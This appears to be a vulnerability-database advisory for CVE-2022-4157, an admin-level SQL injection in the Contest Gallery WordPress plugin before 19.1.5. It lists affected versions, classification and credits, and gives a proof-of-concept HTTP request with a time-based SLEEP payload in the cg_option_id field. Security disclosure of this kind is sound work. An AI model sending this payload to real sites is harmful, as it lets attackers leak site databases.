WordPress Plugin Vulnerabilities

Contest Gallery < 19.1.5 - Admin+ SQL Injection

Description

The plugins do not escape the cg_option_id POST parameter before concatenating it to an SQL query in export-votes-all.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=1&cg_export_votes=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7Cafb735282dd2e1aeaff1d135419c00400e4e0e2a1d85809d6b54f126cfcd1883; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7C7ebf6c23f43d24912558008e7e934286452154ec3874ac04b09a1f136b885df3; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668310439
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

cg_export_votes=true&cg_export_votes_all=true&cg_option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3)))UrUZ)

Affects Plugins

Plugin icon
contest-gallery
Fixed in 19.1.5
Plugin icon
contest-gallery-pro
Fixed in 19.1.5

References

CVE
CVE-2022-4157
URL
https://bulletin.iese.de/post/contest-gallery_19-1-4-1_3

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Kunal Sharma
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
71feec63-67a5-482e-bf77-1396c306fae6

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other

Published
Title
Published
2024-02-26
Title
NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor < 2.8.3 - Unauthenticated SQL Injection
Published
2017-08-07
Title
Easy Modal < 2.1.0 - Authenticated SQL Injection
Published
2013-01-21
Title
WordPress Poll <= 34.05 - SQL Injection
Published
2014-08-01
Title
NextGEN Smooth Gallery - Blind SQL Injection
Published
2015-05-06
Title
Freshmail for WordPress < 1.6 - Unauthenticated SQL Injection